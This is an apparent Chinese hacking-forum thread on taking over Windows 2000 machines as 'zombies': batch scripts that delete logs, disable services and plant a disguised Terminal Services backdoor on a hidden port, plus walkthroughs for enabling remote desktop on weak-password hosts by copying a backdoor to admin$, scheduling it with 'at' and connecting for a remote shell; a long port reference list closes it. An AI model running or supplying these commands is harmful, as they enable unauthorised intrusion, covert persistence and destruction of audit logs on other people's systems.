echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\paramete

rs]>>
c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default
properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END

:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the
command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF

:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.

:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file
---------------------------


2.全面加固系统(给肉鸡打补丁)的批处理文件
------------------------ cut here then save as .bat or .cmd file
---------------------------

@echo Windows Registry Editor Version 5.00 >patch.dll
@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\paramete

rs]
>>patch.dll

@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
>>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登录]

@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
>>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件访问和打印共享]

@echo
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登录前关机]

@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止显示前一个登录用户名称]
@regedit /s patch.dll

------------------------ cut here then save as .bat or .cmd file
---------------------------

下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal

service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
@del c:\winnt\system32\config\*.event /f /q
@del c:\winnt\system32dtclog\*.* /f /q
@del c:\winnt\*.txt /f /q
@del c:\winnt\*.log /f /q
@net start w3svc
@net start event log
@rem [删除日志]


@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危险的服务。]

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>patch.dll
@echo "ortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp >>patch.dll
@echo "ortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
>>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo
"ImagePath"=hex

(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
>>patch.dll
@echo
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,

\
>>patch.dll
@echo
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
>>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows&#39; message。"
>>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]
>>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft

EventLog,留条后路]
-----------------------------------------------------------------------
回复

使用道具 举报

 楼主| 发表于 2005-10-25 23:18:55 | 显示全部楼层
开启3389终端方法和常见问题:

第一种方法:

使用的工具:
1:ipcscan扫描器
2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁.

格式 IPort )
3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品)
4:cscript (在system32文件夹下;98操作系统可能没有
二:步骤:
1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论

坛上再发)

2:用rots.vbs开启终端服务

说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr


三:常见问题:

1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因

为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了.

2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error

description: 没有发现指定的此对象导出者,这个还是放弃吧.

3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口.


第二种方法:

进入后:TELNET上去!

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者!
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等会自动启后就OK


或者:
在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components]

> c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator)

利用at time 获取对方服务器时间。

copy 路径:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服务器执行命令后,服务器将重新启动,利用3389登陆就OK了!


第三种方法:

进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s file://检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s file://检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
file://这是建立无人参与的安装参数
c:\>type c:\rock
[Components]
TSEnable = on
file://检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸

如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大

的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议

.


第四种方法:


C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ ""

/us
er:administrator----------------连接成功!
命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe

\\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe

\\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39

wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!

在这里我只介绍与本文内

容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为

pro版不能安装终端服务。
2分钟后......


---------------------------------------------------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.*

7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
---------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -

connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员

administrator权限。

----------------------------------------------------
[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
-----------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。


----------------------------------------------------
D:\WINNT\system32>cd..
cd..

D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D:\WINNT 的目录

2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节

D:\WINNT>hbulot
hbulot
---------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放

位置。


D:\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot


Command "REBOOT" succeed.

[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,

这里wollf自带的REBOOT
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法

很多,superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运

行了。因为pro版不能安装

终端服务。

到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是

怎么让3389只为你服务!

我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前

者使用的默认端口3389对

目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我

们来修改3389的连接端口

来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

Server\WinStations\RDP-Tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal

Server\WinStations\<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制

,系统会自动转换。


第五种方法:


一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

-----------
2.重新起动"肉机"。

3.使用本地的3398客户端,连接 "肉机" .

4.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务"

仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动

" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务"

处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和

"终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动

" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.

二.抛砖引玉性"隐蔽"安装:

1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名

为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"

2.将如下注册表键值导入 "肉机" 的注册表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex

(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,

\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起动"肉机"。

4.使用本地的3398客户端,连接“肉机”。

5.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务"

仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保

持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" .

其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它

,在 "[Components]" 节,找到与 "终端服务" 有关的条目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也

主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终

端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝

的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器"

生成客户软盘需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连

"TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",

你将会得到证实.

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必

它们一定也有了身份证.

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要

的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过

的.

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt".

"TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices",

"TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端

服务" 没有直接的关系.

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条

"ToggleOnSection = TerminalServices.ToggleOn". 再转到

[TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线

索,我们来到 [Reg.ToggleOn], 你看到什么?
------------------------------------------------------------------------
常用端口说明:

再介绍端口前,先看一下端口的基本知道吧。
1.公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些

端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
2. 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。

也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多

系统处理动态端口从1024左右开始。
3. 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论

上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例

外:SUN的RPC端口从32768开始。
1 tcpmux TCP Port Service Multiplexer 传输控制协议端口服务多路开关选择器
2 compressnet Management Utility     compressnet 管理实用程序
3 compressnet Compression Process    压缩进程
5 rje Remote Job Entry          远程作业登录
7 echo Echo               回显
9 discard Discard            丢弃
11 systat Active Users          在线用户
13 daytime Daytime            时间
17 qotd Quote of the Day         每日引用
18 msp Message Send Protocol       消息发送协议
19 chargen Character Generator      字符发生器
20 ftp-data File Transfer [Default Data] 文件传输协议(默认数据口) 
21 ftp File Transfer [Control]      文件传输协议(控制)
22 ssh SSH Remote Login Protocol     SSH远程登录协议
23 telnet Telnet             终端仿真协议
24 ? any private mail system       预留给个人用邮件系统
25 smtp Simple Mail Transfer       简单邮件发送协议
27 nsw-fe NSW User System FE       NSW 用户系统现场工程师
29 msg-icp MSG ICP            MSG ICP
31 msg-auth MSG Authentication      MSG验证
33 dsp Display Support Protocol     显示支持协议
35 ? any private printer server     预留给个人打印机服务
37 time Time               时间
38 rap Route Access Protocol       路由访问协议
39 rlp Resource Location Protocol    资源定位协议
41 graphics Graphics           图形
42 nameserver WINS Host Name Server   WINS 主机名服务
43 nicname Who Is            "绰号" who is服务
44 mpm-flags MPM FLAGS Protocol     MPM(消息处理模块)标志协议
45 mpm Message Processing Module [recv] 消息处理模块 
46 mpm-snd MPM [default send]      消息处理模块(默认发送口)
47 ni-ftp NI FTP             NI FTP
48 auditd Digital Audit Daemon      数码音频后台服务 
49 tacacs Login Host Protocol (TACACS)  TACACS登录主机协议
50 re-mail-ck Remote Mail Checking Protocol 远程邮件检查协议
51 la-maint IMP Logical Address Maintenance IMP(接口信息处理机)逻辑地址

维护
52 xns-time XNS Time Protocol      施乐网络服务系统时间协议  
53 domain Domain Name Server       域名服务器
54 xns-ch XNS Clearinghouse       施乐网络服务系统票据交换
55 isi-gl ISI Graphics Language     ISI图形语言
56 xns-auth XNS Authentication      施乐网络服务系统验证
57 ? any private terminal access     预留个人用终端访问
58 xns-mail XNS Mail           施乐网络服务系统邮件
59 ? any private file service      预留个人文件服务
60 ? Unassigned             未定义
61 ni-mail NI MAIL            NI邮件?
62 acas ACA Services           异步通讯适配器服务
63 whois+ whois+              WHOIS+
64 covia Communications Integrator (CI) 通讯接口 
65 tacacs-ds TACACS-Database Service   TACACS数据库服务
66 sql*net Oracle SQL*NET        Oracle SQL*NET
67 bootps Bootstrap Protocol Server   引导程序协议服务端
68 bootpc Bootstrap Protocol Client   引导程序协议客户端
69 tftp Trivial File Transfer      小型文件传输协议
70 gopher Gopher             信息检索协议
71 netrjs-1 Remote Job Service      远程作业服务
72 netrjs-2 Remote Job Service      远程作业服务
73 netrjs-3 Remote Job Service      远程作业服务
74 netrjs-4 Remote Job Service      远程作业服务
75 ? any private dial out service    预留给个人拨出服务
76 deos Distributed External Object Store 分布式外部对象存储 
77 ? any private RJE service      预留给个人远程作业输入服务
78 vettcp vettcp             修正TCP?
79 finger Finger             FINGER(查询远程主机在线用户等信

息)
80 http World Wide Web HTTP       全球信息网超文本传输协议
81 hosts2-ns HOSTS2 Name Server     HOST2名称服务
82 xfer XFER Utility           传输实用程序
83 mit-ml-dev MIT ML Device       模块化智能终端ML设备
84 ctf Common Trace Facility       公用追踪设备
85 mit-ml-dev MIT ML Device       模块化智能终端ML设备
86 mfcobol Micro Focus Cobol       Micro Focus Cobol编程语言
87 ? any private terminal link      预留给个人终端连接
88 kerberos Kerberos           Kerberros安全认证系统
89 su-mit-tg SU/MIT Telnet Gateway    SU/MIT终端仿真网关
90 dnsix DNSIX Securit Attribute Token Map DNSIX 安全属性标记图 
91 mit-dov MIT Dover Spooler       MIT Dover假脱机
92 npp Network Printing Protocol     网络打印协议
93 dcp Device Control Protocol      设备控制协议
94 objcall Tivoli Object Dispatcher   Tivoli对象调度
95 supdup SUPDUP            
96 dixie DIXIE Protocol Specification  DIXIE协议规范
97 swift-rvf Swift Remote Virtural File Protocol 快速远程虚拟文件协议 
98 tacnews TAC News           TAC(东京大学自动计算机?)新闻协议
99 metagram Metagram Relay       

101/tcp hostname NIC Host Name Server
102/tcp iso-tsap ISO-TSAP Class 0
103/tcp gppitnp Genesis Point-to-Point Trans Net
104/tcp acr-nema ACR-NEMA Digital Imag. & Comm. 300
105/tcp cso CCSO name server protocol
105/tcp csnet-ns Mailbox Name Nameserver
106/tcp 3com-tsmux 3COM-TSMUX
107/tcp rtelnet Remote Telnet Service
108/tcp snagas SNA Gateway Access Server
109/tcp pop2 Post Office Protocol - Version 2
110/tcp pop3 Post Office Protocol - Version 3
111/tcp sunrpc SUN Remote Procedure Call
112/tcp mcidas McIDAS Data Transmission Protocol
113/tcp ident
114/tcp audionews Audio News Multicast
115/tcp sftp Simple File Transfer Protocol
116/tcp ansanotify ANSA REX Notify
117/tcp uucp-path UUCP Path Service
118/tcp sqlserv SQL Services
119/tcp nntp Network News Transfer Protocol
120/tcp cfdptkt CFDPTKT
121/tcp erpc Encore Expedited Remote Pro.Call
122/tcp smakynet SMAKYNET
123/tcp ntp Network Time Protocol
124/tcp ansatrader ANSA REX Trader
125/tcp locus-map Locus PC-Interface Net Map Ser
126/tcp unitary Unisys Unitary Login
127/tcp locus-con Locus PC-Interface Conn Server
128/tcp gss-xlicen GSS X License Verification
129/tcp pwdgen Password Generator Protocol
130/tcp cisco-fna cisco FNATIVE
131/tcp cisco-tna cisco TNATIVE
132/tcp cisco-sys cisco SYSMAINT
133/tcp statsrv Statistics Service
134/tcp ingres-net INGRES-NET Service
135/tcp epmap DCE endpoint resolution
136/tcp profile PROFILE Naming System
137/tcp netbios-ns NETBIOS Name Service
138/tcp netbios-dgm NETBIOS Datagram Service
139/tcp netbios-ssn NETBIOS Session Service
140/tcp emfis-data EMFIS Data Service
141/tcp emfis-cntl EMFIS Control Service
142/tcp bl-idm Britton-Lee IDM
143/tcp imap Internet Message Access Protocol
144/tcp uma Universal Management Architecture
145/tcp uaac UAAC Protocol
146/tcp iso-tp0 ISO-IP0
147/tcp iso-ip ISO-IP
148/tcp jargon Jargon
149/tcp aed-512 AED 512 Emulation Service
150/tcp sql-net SQL-NET
151/tcp hems HEMS
152/tcp bftp Background File Transfer Program
153/tcp sgmp SGMP
154/tcp netsc-prod NETSC
155/tcp netsc-dev NETSC
156/tcp sqlsrv SQL Service
157/tcp knet-cmp KNET/VM Command/Message Protocol
158/tcp pcmail-srv PCMail Server
159/tcp nss-routing NSS-Routing
160/tcp sgmp-traps SGMP-TRAPS
161/tcp snmp SNMP
162/tcp snmptrap SNMPTRAP
163/tcp cmip-man CMIP/TCP Manager
164/tcp cmip-agent CMIP/TCP Agent
165/tcp xns-courier Xerox
166/tcp s-net Sirius Systems
167/tcp namp NAMP
168/tcp rsvd RSVD
169/tcp send SEND
170/tcp print-srv Network PostScript
171/tcp multiplex Network Innovations Multiplex
172/tcp cl/1 Network Innovations CL/1
173/tcp xyplex-mux Xyplex
174/tcp mailq MAILQ
175/tcp vmnet VMNET
176/tcp genrad-mux GENRAD-MUX
177/tcp xdmcp X Display Manager Control Protocol
178/tcp nextstep NextStep Window Server
179/tcp bgp Border Gateway Protocol
180/tcp ris Intergraph
181/tcp unify Unify
182/tcp audit Unisys Audit SITP
183/tcp ocbinder OCBinder
184/tcp ocserver OCServer
185/tcp remote-kis Remote-KIS
186/tcp kis KIS Protocol
187/tcp aci Application Communication Interface
188/tcp mumps Plus Five‘s MUMPS
189/tcp qft Queued File Transport
190/tcp gacp Gateway Access Control Protocol
191/tcp prospero Prospero Directory Service
192/tcp osu-nms OSU Network Monitoring System
193/tcp srmp Spider Remote Monitoring Protocol
194/tcp irc Internet Relay Chat Protocol
195/tcp dn6-nlm-aud DNSIX Network Level Module Audit
196/tcp dn6-smm-red DNSIX Session Mgt Module Audit Redir
197/tcp dls Directory Location Service
198/tcp dls-mon Directory Location Service Monitor
199/tcp smux SMUX
200/tcp src IBM System Resource Controller
201/tcp at-rtmp AppleTalk Routing Maintenance
202/tcp at-nbp AppleTalk Name Binding
203/tcp at-3 AppleTalk Unused
204/tcp at-echo AppleTalk Echo
205/tcp at-5 AppleTalk Unused
206/tcp at-zis AppleTalk Zone Information
207/tcp at-7 AppleTalk Unused
208/tcp at-8 AppleTalk Unused
209/tcp qmtp The Quick Mail Transfer Protocol
210/tcp z39.50 ANSI Z39.50
211/tcp 914c/g Texas Instruments 914C/G Terminal
212/tcp anet ATEXSSTR
214/tcp vmpwscs VM PWSCS
215/tcp softpc Insignia Solutions
216/tcp CAIlic Computer Associates Int‘l License Server
217/tcp dbase dBASE Unix
218/tcp mpp Netix Message Posting Protocol
219/tcp uarps Unisys ARPs
220/tcp imap3 Interactive Mail Access Protocol v3
221/tcp fln-spx Berkeley rlogind with SPX auth
222/tcp rsh-spx Berkeley rshd with SPX auth
223/tcp cdc Certificate Distribution Center
242/tcp direct Direct
243/tcp sur-meas Survey Measurement
244/tcp dayna Dayna
245/tcp link LINK
246/tcp dsp3270 Display Systems Protocol
247/tcp subntbcst_tftp SUBNTBCST_TFTP
248/tcp bhfhs bhfhs
256/tcp rap RAP
257/tcp set Secure Electronic Transaction
258/tcp yak-chat Yak Winsock Personal Chat
259/tcp esro-gen Efficient Short Remote Operations
260/tcp openport Openport
263/tcp hdap HDAP
264/tcp bgmp BGMP
280/tcp http-mgmt http-mgmt
309/tcp entrusttime EntrustTime
310/tcp bhmds bhmds
312/tcp vslmp VSLMP
315/tcp dpsi DPSI
316/tcp decauth decAuth
317/tcp zannet Zannet
321/tcp pip PIP
344/tcp pdap Prospero Data Access Protocol
345/tcp pawserv Perf Analysis Workbench
346/tcp zserv Zebra server
347/tcp fatserv Fatmen Server
348/tcp csi-sgwp Cabletron Management Protocol
349/tcp mftp mftp
351/tcp matip-type-b MATIP Type B
351/tcp bhoetty bhoetty (added 5/21/97)
353/tcp ndsauth NDSAUTH
354/tcp bh611 bh611
357/tcp bhevent bhevent
362/tcp srssend SRS Send
365/tcp dtk DTK
366/tcp odmr ODMR
